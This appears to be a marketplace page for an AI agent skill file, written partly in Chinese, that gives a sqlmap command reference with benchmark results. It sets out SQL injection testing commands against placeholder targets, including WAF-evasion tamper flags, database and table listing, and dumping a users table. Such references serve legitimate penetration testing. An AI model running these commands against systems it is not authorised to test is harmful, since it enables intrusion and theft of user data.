Install any skill in seconds. Free to start, no credit card required.
Get Started Free →Strix sqlmap 命令手册,覆盖目标语法、无交互执行与常见枚举流程;触发名:strix-sqlmap
.claude/skills/asdfgh1445-strix-sqlmap/SKILL.md| Test case | Without → With | Effect | Δ tokens | Δ turns |
|---|---|---|---|---|
| case-05 | ✗→✓ | ▲ Improved | 23% | 0% |
| case-14 | ✗→✓ | ▲ Improved | -44% | 0% |
| case-15 | ✗→✓ | ▲ Improved | -27% | 0% |
| case-18 | ✗→✓ | ▲ Improved | 1% | 0% |
| case-19 | ✗→✓ | ▲ Improved | 52% | 0% |
Official docs:
Canonical syntax: sqlmap -u "<target_url_with_params>" [options]
High-signal flags:
-u, --url <url> target URL-r <request_file> raw HTTP request input-p <param> test specific parameter(s)--batch non-interactive mode--level <1-5> test depth--risk <1-3> payload risk profile--threads <n> concurrency--technique <letters> technique selection--forms parse and test forms from target page--cookie <cookie> and --headers <headers> authenticated context--timeout <seconds> and --retries <n> transport stability--tamper <scripts> WAF/input-filter evasion--random-agent randomize user-agent--ignore-proxy bypass configured proxy--dbs, -D <db> --tables, -D <db> -T <table> --columns, -D <db> -T <table> -C <cols> --dump--flush-session clear cached scan stateAgent-safe baseline for automation: sqlmap -u "https://target.tld/item?id=1" -p id --batch --level 2 --risk 1 --threads 5 --timeout 10 --retries 1 --random-agent
Common patterns:
sqlmap -u "https://target.tld/item?id=1" -p id --batch --level 2 --risk 1 --threads 5
sqlmap -u "https://target.tld/login" --data "user=admin&pass=test" -p pass --batch --level 2 --risk 1
sqlmap -u "https://target.tld/login" --forms --batch --level 2 --risk 1 --random-agent
sqlmap -u "https://target.tld/item?id=1" -p id --batch --dbs
sqlmap -u "https://target.tld/item?id=1" -p id --batch -D appdb --tables
sqlmap -u "https://target.tld/item?id=1" -p id --batch -D appdb -T users -C id,email,role --dump
Critical correctness rules:
--batch in automation to avoid interactive prompts.-p when possible.--flush-session when retesting after request/profile changes.--level 1-2, --risk 1) and escalate only when needed.Usage rules:
--cookie/--headers) aligned with manual validation state.-D/-T/-C) over broad dump-first behavior.-h/--help during normal execution unless absolutely necessary.Failure recovery:
--flush-session.--threads and test targeted --tamper chains.--level/--risk gradually.If uncertain, query web_search with: site:github.com/sqlmapproject/sqlmap/wiki/usage sqlmap <flag>
Other measured skills in the registry, with their headline benchmark lift.